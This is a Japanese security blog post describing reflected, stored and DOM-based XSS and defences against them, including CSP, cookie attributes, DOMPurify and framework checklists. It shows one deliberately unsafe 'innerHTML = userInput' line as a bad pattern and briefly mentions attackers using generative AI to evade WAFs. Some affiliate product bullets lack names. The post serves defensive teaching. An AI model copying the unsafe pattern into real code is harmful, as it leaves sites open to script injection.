XSSの3種類：反射型・格納型・DOM型の違い

XSSは攻撃の仕組みによって大きく3種類に分類されます。それぞれの特性を理解することが、適切な対策を選択するうえで重要です。

① 反射型XSS（Reflected XSS）

攻撃者が細工したURLにユーザーがアクセスすることで発動する、最も一般的なXSSです。悪意あるスクリプトはサーバーに保存されず、URLのパラメーターとして送信されたスクリプトがそのままレスポンスに反射（Reflect）されてブラウザで実行されます。フィッシングメールや短縮URLを利用してターゲットを誘導するのが典型的な手口です。

Example Domain
example.com

② 格納型XSS（Stored XSS / Persistent XSS）

攻撃スクリプトがデータベースやファイルに保存され、ページを閲覧するすべてのユーザーに影響を与えるタイプです。コメント機能、プロフィール欄、掲示板など、ユーザー投稿内容を表示する機能に存在します。一度埋め込まれると多数のユーザーが被害を受けるため、3種類の中で最も危険性が高いとされています。2023年に発覚した某大手ECサイトの被害事例でも、この格納型XSSが悪用されました。

③ DOM型XSS（DOM-based XSS）

サーバーを介さず、クライアントサイドのJavaScriptがDOMを操作する際に発生するXSSです。`document.URL`、`location.hash`、`innerHTML`などのDOM APIを通じて悪意あるコードが実行されます。サーバーログに攻撃の痕跡が残りにくいため、検出・調査が困難という特徴があります。SPAやReact/Vue/Angularを使ったフロントエンドで特に注意が必要です。

2026年の最新XSS攻撃トレンド

XSS攻撃は年々高度化しています。2026年現在、特に注目すべきトレンドをIPAおよびJPCERT/CCの報告をもとに整理します。

AIを活用したXSSペイロード生成

攻撃者が生成AIを使ってWAF（Webアプリケーションファイアウォール）のフィルタリングを回避するXSSペイロードを自動生成するケースが増加しています。従来のシグネチャベースのWAFでは検出困難なケースも報告されており、WAFのルールの継続的な更新と、根本的なコードレベルの対策の併用が不可欠です。

サプライチェーン経由のXSS（Stored XSS in CDN）

外部CDNやサードパーティライブラリ（npm等）を通じてXSSスクリプトが埋め込まれる「サプライチェーンXSS」が増加しています。2024年に発覚したpolyfill.ioへの攻撃では、世界中のWebサイトが悪意あるスクリプトを配信させられました。自社コードだけでなく、依存ライブラリのセキュリティ管理も重要です。

マークダウン・リッチテキストエディタの脆弱性悪用

CMSやSaaSで広く使われるリッチテキストエディタやマークダウンパーサーの実装不備を狙ったXSS攻撃が増えています。`javascript:` スキームを使ったリンク属性や、SVG要素内のスクリプトを悪用する手口が報告されています。

XSS対策の基本：エスケープ処理とバリデーション

XSS対策の根本は、ユーザー入力をHTMLとして解釈させないことです。具体的には以下の対策を実装します。

出力時のHTMLエスケープ（最重要）

ユーザー入力をHTMLに出力する際は、必ず特殊文字をエスケープします。最低限以下の5文字を変換します。

現代のWebフレームワーク（React、Vue、Angular、Rails、Laravel等）はテンプレートエンジンでデフォルトエスケープを行いますが、意図せず生のHTML出力をしていないか確認することが重要です。ReactでいえばdangerouslySetInnerHTML、VueでいえばV-htmlが危険箇所です。

入力バリデーション

入力値を受け取る際に、許可する文字・形式をホワイトリスト方式で検証します。例えばメールアドレスはメール形式のみ、電話番号は数字・ハイフンのみを許可します。ブラックリスト方式（`<script>`を弾く等）は回避されやすいため非推奨です。

textContentの使用（JavaScript）

JavaScriptでDOM操作をする場合、`innerHTML`の代わりに`textContent`または`innerText`を使用します。これにより文字列がHTMLとして解釈されず、スクリプトが実行されません。

// 危険な実装
element.innerHTML = userInput;

// 安全な実装
element.textContent = userInput;

XSS対策の応用：CSP・Cookie設定・DOMPurify

Content Security Policy（CSP）の設定

CSP（コンテンツセキュリティポリシー）は、ブラウザが実行を許可するリソースの種類・送信元をHTTPヘッダーで制御する仕組みです。適切なCSPを設定することで、攻撃者がXSSに成功してもスクリプトの実行をブロックできます。

# Nginxでの設定例
add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'nonce-{RANDOM}'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:; object-src 'none';"

特に`script-src ‘unsafe-inline’`は避け、`nonce`または`hash`ベースのCSPを採用することで、インラインスクリプトの実行を制限できます。Google、GitHub等の主要サービスはすべてCSPを実装しています。

Cookie の HttpOnly・Secure・SameSite 属性

XSS攻撃でセッションCookieが盗まれるリスクを軽減するため、Cookie属性を適切に設定します。

• HttpOnly：JavaScriptからのCookieアクセスを禁止（`document.cookie`での取得不可）
• Secure：HTTPS接続時のみCookieを送信
• SameSite=Strict or Lax：クロスサイトリクエスト時のCookie送信を制限しCSRF対策にもなる

DOMPurify によるサニタイズ

リッチテキストエディタ等でHTMLの入力を許容しなければならない場合は、DOMPurify等のサニタイズライブラリを使用します。DOMPurifyは信頼できるXSSサニタイザとして広く採用されており、危険なタグ・属性を除去しながら安全なHTMLを返します。

import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userInput);
element.innerHTML = clean; // 安全

フレームワーク別XSS対策チェックポイント

React

• `dangerouslySetInnerHTML`の使用箇所を全件レビューし、使用する場合はDOMPurifyでサニタイズ
• URLを`href`に使用する場合は`javascript:`スキームをブロック（`href={sanitizeUrl(url)}`）
• 依存ライブラリのXSS脆弱性を`npm audit`で定期チェック

Vue.js

• `v-html`ディレクティブは必要最小限に限定し、使用前にサニタイズ
• テンプレート内の`{{ }}`構文はデフォルトでエスケープされるため安全
• `v-bind`で属性にユーザー入力を使用する場合はURLバリデーションを実施

WordPress

• 出力時は`esc_html()`・`esc_attr()`・`esc_url()`・`wp_kses()`を用途に応じて使用
• プラグイン・テーマは公式ディレクトリから入手し、常に最新版を維持
• 管理者アカウントへの二要素認証（2FA）を有効化してXSS経由の乗っ取りを防止

詳しくはSQLインジェクション対策ガイドやフィッシング攻撃対策ガイドも合わせてご覧ください。

脆弱性診断・WAFによるXSS検出と防御

定期的な脆弱性診断の実施

XSSをはじめとするWebアプリ脆弱性を発見するために、定期的な脆弱性診断が有効です。ツールを使った自動診断と、専門家によるペネトレーションテスト（侵入テスト）を組み合わせるのが理想です。OWASPが提供する無料ツール「ZAP（Zed Attack Proxy）」は、Webアプリの自動スキャンに広く使われています。

WAF（Webアプリケーションファイアウォール）の導入

WAFはHTTPリクエスト・レスポンスを検査し、XSSを含む攻撃パターンをブロックします。クラウド型WAF（AWS WAF、Cloudflare WAF等）はシグネチャの自動更新や、機械学習ベースの異常検知が利用でき、中小企業でも比較的容易に導入できます。ただしWAFはあくまで多層防御の一層であり、コードレベルの対策との併用が必須です。

セキュリティヘッダーの設定確認

X-XSS-Protectionヘッダーは旧来ブラウザのXSSフィルター制御に使われていましたが、現代のブラウザでは廃止されています。代わりにCSPが現代標準の防御手段です。`securityheaders.com`等の無料ツールで自社サイトのヘッダー設定を確認できます。

IPAが公開している脆弱性対策情報（IPA）や情報セキュリティ10大脅威 2026（IPA）も定期的に参照し、最新の脅威情報をキャッチアップしましょう。

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
XSS攻撃でマルウェアが配布された場合の被害を最小化するには、エンドポイントセキュリティソフトの導入が第一歩です。信頼性の高いセキュリティソフトで端末を守りましょう。

• — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト
• — 日本語サポートが充実。国産ソフトで中小企業導入実績多数
• — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：XSS対策のチェックリスト

XSS攻撃は種類・手口が多岐にわたりますが、基本的な対策を体系的に実装することで大幅にリスクを低減できます。

• ✅ 出力エスケープ：すべてのユーザー入力出力箇所でHTMLエスケープを実施
• ✅ 入力バリデーション：ホワイトリスト方式でフォーム入力を検証
• ✅ CSP設定：適切なContent-Security-Policyヘッダーを設定
• ✅ Cookie属性：HttpOnly・Secure・SameSiteを必ず設定
• ✅ innerHTML回避：JavaScriptのDOM操作はtextContentを優先
• ✅ ライブラリ更新：依存パッケージの脆弱性を定期スキャン
• ✅ 脆弱性診断：年1回以上のWebアプリ診断を実施

XSSは「古い脆弱性」と思われがちですが、実装の複雑化やフロントエンド技術の多様化により、2026年現在も継続的に発見・悪用されています。開発チーム全体でセキュアコーディングの文化を育て、継続的な対策を維持することが企業のWebセキュリティの根幹です。

関連記事

・SQLインジェクション攻撃の手口と対策ガイド
・フィッシング攻撃の最新手口と企業向け対策ガイド

The post XSS攻撃の仕組みと対策ガイド【2026年版】 appeared first on AI Security Review.